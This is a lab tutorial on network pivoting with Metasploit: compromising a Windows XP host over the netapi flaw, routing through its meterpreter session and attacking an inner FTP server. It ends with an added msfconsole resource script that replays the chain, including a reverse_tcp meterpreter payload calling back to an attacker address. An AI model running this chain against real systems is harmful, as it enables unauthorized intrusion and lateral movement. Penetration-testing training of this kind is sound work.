METASPLOIT - PIVOTING
- Layout for this exercise:
- First, let's exploit the pivot (a Windows XP host) by taking advantage of the netapi vulnerability:
- Setting the remote host to the XP pivot's IP address:
- Choosing a meterpreter payload delivered over a reverse_tcp connection:
- Because the payload is a reverse shell, the local host is the attacker itself, which the pivot can reach directly on the outside network:
- Once the exploit is launched, the attack succeeds and a meterpreter session is opened:
- The pivot has two interfaces, one on the outside network 192.168.1.0 and the other on the inside network 10.0.0.0:
- Let's discover hosts on the inside network 10.0.0.0/24. Since 10.0.0.1 is the pivot XP's own inside address, 10.0.0.2 must belong to the innermost machine, the victim:
- Backgrounding meterpreter session 1, so the console is free while the session stays open:
- So far there is only one active meterpreter session, number 1:
- A route to the inside network is added through the active meterpreter session 1, so that Metasploit modules can reach 10.0.0.0/24 via the pivot:
- Printing the routing table to verify the new entry:
- Leaving the netapi exploit module with back:
- Scanning for open ports (only 1 to 500) on the victim 10.0.0.2 through the pivot route:
- Several interesting ports are open, for instance TCP 21, usually dedicated to the FTP service:
- Leaving the auxiliary module with back:
- Now, let's try attacking the FTP service on the victim:
- Setting the victim's IP as the remote host:
- Let's use the payload cmd/unix/interact to get a remote shell. This payload talks over the exploited service's own TCP connection, which matters here: the victim on 10.0.0.0/24 has no route back to the attacker, so a reverse payload would never connect:
- Required options:
- Once the exploit is run, the attack succeeds: a remote shell on the victim's machine is finally obtained, tunneled back through the pivot:
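The whole procedure above, written as a msfconsole resource script so it can be replayed in one go (run with `msfconsole -q -r pivot.rc`). This is an added example, not the page's own screenshots or commands. Assumptions: the attacker is 192.168.1.10 and the pivot's outside address is 192.168.1.20 (the page only gives the two networks and the 10.0.0.x hosts); the netapi vulnerability is exercised with the ms08_067_netapi module; the FTP exploit module is not named on the page and is left as a placeholder to fill in.

```msf
# pivot.rc - constructed example for the page's lab, not the original commands.
# Assumed addresses: attacker 192.168.1.10, pivot XP 192.168.1.20 / 10.0.0.1,
# inner victim 10.0.0.2. Older consoles spell the remote host option RHOST.

# 1. Exploit the pivot over its outside interface. The netapi flaw on XP is
#    assumed to map to the ms08_067_netapi module (the page only says "netapi").
use exploit/windows/smb/ms08_067_netapi
set RHOSTS 192.168.1.20
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10   # reverse shell: the pivot can reach the attacker directly
set LPORT 4444
# -z keeps the console out of the new session, i.e. the page's "background" step
exploit -z

# 2. Look at the pivot's interfaces and find the inner host from the console,
#    running commands on session 1 without interacting with it.
sessions -i 1 -C ipconfig
use post/windows/gather/arp_scanner
set SESSION 1
set RHOSTS 10.0.0.0/24
run
back

# 3. Route the inside network through meterpreter session 1 and verify it.
route add 10.0.0.0 255.255.255.0 1
route print

# 4. TCP port scan of the victim through the route. Only TCP connections are
#    tunneled by a meterpreter route, so ICMP or ARP sweeps from the console
#    would not reach 10.0.0.2; the arp_scanner above ran on the pivot itself.
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.0.0.2
set PORTS 1-500
set THREADS 5
run
back

# 5. Attack the FTP service. The page does not name the module, so the path
#    below is a placeholder to fill in. cmd/unix/interact reuses the exploit's
#    own TCP connection, so no LHOST is set and nothing has to route back
#    from 10.0.0.2 to the attacker.
use exploit/unix/ftp/<ftp_module>
set RHOSTS 10.0.0.2
set RPORT 21
set PAYLOAD cmd/unix/interact
show options
exploit
```

Two checks worth doing before step 5: `route print` must list 10.0.0.0/255.255.255.0 against session 1, and the port scan must report 21/tcp open, since the scan is the proof that the route is actually carrying traffic. If the pivot session dies, the route dies with it and every later module silently fails to connect, so re-run `route print` after any session loss.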